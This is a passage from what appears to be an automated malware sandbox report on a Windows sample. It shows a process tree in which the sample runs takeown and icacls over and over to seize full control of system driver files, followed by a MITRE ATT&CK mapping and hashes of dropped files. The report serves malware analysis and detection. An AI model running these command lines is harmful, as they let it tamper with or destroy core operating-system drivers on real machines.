  - C:\Windows\System32\cmd.exe (PID 1444): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdx.sys && icacls C:\Windows\System32\drivers\tdx.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4804): takeown /f C:\Windows\System32\drivers\tdx.sys
    - C:\Windows\system32\icacls.exe (PID 4700): icacls C:\Windows\System32\drivers\tdx.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 3708): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\termdd.sys && icacls C:\Windows\System32\drivers\termdd.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4736): takeown /f C:\Windows\System32\drivers\termdd.sys
    - C:\Windows\system32\icacls.exe (PID 4188): icacls C:\Windows\System32\drivers\termdd.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4248): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\terminpt.sys && icacls C:\Windows\System32\drivers\terminpt.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 5032): takeown /f C:\Windows\System32\drivers\terminpt.sys
    - C:\Windows\system32\icacls.exe (PID 4232): icacls C:\Windows\System32\drivers\terminpt.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4208): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tssecsrv.sys && icacls C:\Windows\System32\drivers\tssecsrv.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4672): takeown /f C:\Windows\System32\drivers\tssecsrv.sys
    - C:\Windows\system32\icacls.exe (PID 5056): icacls C:\Windows\System32\drivers\tssecsrv.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4676): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\TsUsbFlt.sys && icacls C:\Windows\System32\drivers\TsUsbFlt.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4620): takeown /f C:\Windows\System32\drivers\TsUsbFlt.sys
    - C:\Windows\system32\icacls.exe (PID 4992): icacls C:\Windows\System32\drivers\TsUsbFlt.sys /grant "Admin:F"  [Modifies file permissions]
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\TsUsbGD.sys && icacls C:\Windows\System32\drivers\TsUsbGD.sys /grant "%username%:F" && exit2⤵PID:4504
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\TsUsbGD.sys3⤵
- Modifies file permissions
PID:4164
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\TsUsbGD.sys /grant "Admin:F"3⤵PID:4916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tsusbhub.sys && icacls C:\Windows\System32\drivers\tsusbhub.sys /grant "%username%:F" && exit2⤵PID:4904
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tsusbhub.sys3⤵
- Modifies file permissions
PID:4864
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\tsusbhub.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tunnel.sys && icacls C:\Windows\System32\drivers\tunnel.sys /grant "%username%:F" && exit2⤵PID:3856
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tunnel.sys3⤵PID:5104
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\tunnel.sys /grant "Admin:F"3⤵PID:4312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\UAGP35.SYS && icacls C:\Windows\System32\drivers\UAGP35.SYS /grant "%username%:F" && exit2⤵PID:3944
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\UAGP35.SYS3⤵PID:4100
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\UAGP35.SYS /grant "Admin:F"3⤵PID:4704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\udfs.sys && icacls C:\Windows\System32\drivers\udfs.sys /grant "%username%:F" && exit2⤵PID:5020
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\udfs.sys3⤵PID:4204
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\udfs.sys /grant "Admin:F"3⤵PID:5012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ULIAGPKX.SYS && icacls C:\Windows\System32\drivers\ULIAGPKX.SYS /grant "%username%:F" && exit2⤵PID:4752
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ULIAGPKX.SYS3⤵PID:5056
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ULIAGPKX.SYS /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\umbus.sys && icacls C:\Windows\System32\drivers\umbus.sys /grant "%username%:F" && exit2⤵PID:4392
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\umbus.sys3⤵PID:4976
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\umbus.sys /grant "Admin:F"3⤵PID:4236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\umpass.sys && icacls C:\Windows\System32\drivers\umpass.sys /grant "%username%:F" && exit2⤵PID:3444
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\umpass.sys3⤵PID:4736
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\umpass.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:5024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usb8023.sys && icacls C:\Windows\System32\drivers\usb8023.sys /grant "%username%:F" && exit2⤵PID:4216
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usb8023.sys3⤵
- Possible privilege escalation attempt
PID:3452
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\usb8023.sys /grant "Admin:F"3⤵PID:4344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\USBCAMD2.sys && icacls C:\Windows\System32\drivers\USBCAMD2.sys /grant "%username%:F" && exit2⤵PID:3428
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\USBCAMD2.sys3⤵
- Modifies file permissions
PID:4300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbccgp.sys && icacls C:\Windows\System32\drivers\usbccgp.sys /grant "%username%:F" && exit2⤵PID:4460
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbccgp.sys3⤵PID:4572
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\usbccgp.sys /grant "Admin:F"3⤵PID:4788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbcir.sys && icacls C:\Windows\System32\drivers\usbcir.sys /grant "%username%:F" && exit2⤵PID:4264
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbcir.sys3⤵PID:4312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbd.sys && icacls C:\Windows\System32\drivers\usbd.sys /grant "%username%:F" && exit2⤵PID:4756
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbehci.sys && icacls C:\Windows\System32\drivers\usbehci.sys /grant "%username%:F" && exit2⤵PID:5000
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbhub.sys && icacls C:\Windows\System32\drivers\usbhub.sys /grant "%username%:F" && exit2⤵PID:4992
-
-
C:\Windows\system32\conhost.exe (tree depth 1, PID: 2684)
  Command line: \??\C:\Windows\system32\conhost.exe "666553407-2422271071440901352518037052-2141748745-522475677-19508463651134594234"
C:\Windows\system32\conhost.exe (tree depth 1, PID: 2680)
  Command line: \??\C:\Windows\system32\conhost.exe "-1857899218-1560305888292797261-973535272-2141762495-976787630-995740567574803656"
C:\Windows\system32\conhost.exe (tree depth 1, PID: 2132)
  Command line: \??\C:\Windows\system32\conhost.exe "1122199040-1714473253-6982048164051347578279849026270384887940930991690827210"
C:\Windows\system32\conhost.exe (tree depth 1, PID: 2104)
  Command line: \??\C:\Windows\system32\conhost.exe "-1142349054193998270-4376408322126249794-21075152341801744279364151453-1508406435"
C:\Windows\system32\conhost.exe (tree depth 1, PID: 2472)
  Command line: \??\C:\Windows\system32\conhost.exe "58918096612940820291210510747981798257-1623490249-403905952-132946968972695468"
C:\Windows\system32\conhost.exe (tree depth 1, PID: 2272)
  Command line: \??\C:\Windows\system32\conhost.exe "181547942145088162-1378572561-62364378421351882091210538253-796265935-1525391288"
C:\Windows\system32\conhost.exe (tree depth 1, PID: 2480)
  Command line: \??\C:\Windows\system32\conhost.exe "4320833181942980929-1956925131212349001920187850-15116099464401488751355876890"
C:\Windows\system32\conhost.exe (tree depth 1, PID: 3080)
  Command line: \??\C:\Windows\system32\conhost.exe "-1920746531-64127857612429799901166786120-1167891504-57243096820643700871522377342"
C:\Windows\system32\conhost.exe (tree depth 1, PID: 3240)
  Command line: \??\C:\Windows\system32\conhost.exe "3851295451085023222-49118410-80606526393047973-1948715543-1316971505-1514205931"
C:\Windows\system32\conhost.exe (tree depth 1, PID: 3764)
  Command line: \??\C:\Windows\system32\conhost.exe "791483365650075742-2141357394-1938479178-1030364850-305016780-13330945831296903710"
C:\Windows\system32\conhost.exe (tree depth 1, PID: 2272)
  Command line: \??\C:\Windows\system32\conhost.exe "-19057771901086172174425028665-1512937910593990518-118355082417153801901727868614"
C:\Windows\system32\conhost.exe (tree depth 1, PID: 3824)
  Command line: \??\C:\Windows\system32\conhost.exe "1508030809-1666408161980747996-654105463-18330992091687735845226571197153685715"
C:\Windows\system32\conhost.exe (tree depth 1, PID: 3588)
  Command line: \??\C:\Windows\system32\conhost.exe "21079505831468012149-528521608-54491765720108574901560526527-1476080363-40170271"
C:\Windows\system32\conhost.exe (tree depth 1, PID: 3624)
  Command line: \??\C:\Windows\system32\conhost.exe "-1129626361-1431669524459659054462678251-711793461148555146-15445423641142995978"
C:\Windows\system32\conhost.exe (tree depth 1, PID: 3668)
  Command line: \??\C:\Windows\system32\conhost.exe "-76288665615261338061371076977662147246-10684951251396307912-67375366-1041245914"
C:\Windows\system32\conhost.exe (tree depth 1, PID: 3508)
  Command line: \??\C:\Windows\system32\conhost.exe "57622938220461837059858588151405591021-60575046-1335643898839262876177357112"
C:\Windows\system32\conhost.exe (tree depth 1, PID: 3276)
  Command line: \??\C:\Windows\system32\conhost.exe "937289004209287889020506465381855621753-249693099-775495679508299926-205205035"
C:\Windows\system32\conhost.exe (tree depth 1, PID: 3900)
  Command line: \??\C:\Windows\system32\conhost.exe "123878135518568282514484283981726139469-898391805-6996257252085277726-705776365"
C:\Windows\system32\conhost.exe (tree depth 1, PID: 4104)
  Command line: \??\C:\Windows\system32\conhost.exe "-507257125936842317-708959292-1486256913925326347-928996548-1471415050-61980815"
C:\Windows\system32\conhost.exe (tree depth 1, PID: 4076)
  Command line: \??\C:\Windows\system32\conhost.exe "299750112567717925537317446-2701742491739786731-944788160142238702-1848904695"
C:\Windows\system32\conhost.exe (tree depth 1, PID: 3296)
  Command line: \??\C:\Windows\system32\conhost.exe "138940903118434457892044297336590645185-13323534821761808338-154971858678053993"
C:\Windows\system32\conhost.exe (tree depth 1, PID: 592)
  Command line: \??\C:\Windows\system32\conhost.exe "519298200-9503947269868885542099136202518254041-1838982058-12358455941789867121"
C:\Windows\system32\conhost.exe (tree depth 1, PID: 3160)
  Command line: \??\C:\Windows\system32\conhost.exe "141613501-5093261101947822003-540648113-2043727716274538102943939993-1415160023"
C:\Windows\system32\conhost.exe (tree depth 1, PID: 5060)
  Command line: \??\C:\Windows\system32\conhost.exe "9001074441218173475-1962976404-77386517-208755407783214961-9172194951994295676"
C:\Windows\system32\conhost.exe (tree depth 1, PID: 4852)
  Command line: \??\C:\Windows\system32\conhost.exe "-11544565721734145971-19077135641114810090499061891834485510-1125949751-930077534"
C:\Windows\system32\conhost.exe (tree depth 1, PID: 4432)
  Command line: \??\C:\Windows\system32\conhost.exe "-12406514371204475962145167884-1804359337-1993179521759341161858387789-924677391"
C:\Windows\system32\conhost.exe (tree depth 1, PID: 4684)
  Command line: \??\C:\Windows\system32\conhost.exe "504932160-37616093-1457095057-2143970331-1334395421-1804905721848453421-1304212327"
Network
MITRE ATT&CK Enterprise v15 (technique counts in parentheses)
Persistence
  Boot or Logon Autostart Execution (2)
    Winlogon Helper DLL (2)
  Event Triggered Execution (1)
    Change Default File Association (1)
Privilege Escalation
  Abuse Elevation Control Mechanism (1)
    Bypass User Account Control (1)
  Boot or Logon Autostart Execution (2)
    Winlogon Helper DLL (2)
  Event Triggered Execution (1)
    Change Default File Association (1)
Downloads
-
C:\Users\Admin\Desktop\±╩σ█±♣77╔öïž╚₧•6♥å↕½²¾7○«↕╧č╩í╔ñå♫▀Â↕σø╧♣ó◘∩╠∩ě♪4±█σ♣☼▌µσ¤♠╔øÿ♣¶≈43ä▀5↑ÿ∩Æ╥£╤9√®ß╚ß∞╬6£®♣♫ε↑Æ╩Â▄♠↕♀▌
  Filesize: 666B
  MD5: 9e1e5883c74742a497cf5c272ccd2321
  SHA1: 2cf33e34d08b8e17743a60352baffef4b6f02dee
  SHA256: ca687b6a7c3d29b566f3e1988b9f877b51d9a83ee25ffe0755a8dcd3eb5f434a
  SHA512: f2284f0c624cc07a65c16f87865bb98aaa176b1d8b45cd4fbcc1143c9c2297fe6b1d4db55ef054be2bc151c8cc25ff4da7c997b7d38dae3dccd2ffe1c3c01a6b
Second dropped file (path not given in the report)
  Filesize: 103KB
  MD5: 373d53d7c6709d5106b29a26a71b0d31
  SHA1: 1708009c111266ba513503e06b94a5ccd402dee5
  SHA256: de3f42bc53000d3dad58f3182108c414ce8062095ef390314fcc628473490c86
  SHA512: 15b32cd9b87a9852d6ad0f03321edb15468e136a220ff4473bc109355c9b401a4c4f7eeb99ad7097c67f9cfac7c416f84038c0639e4db59561d2dbc74ef5d67d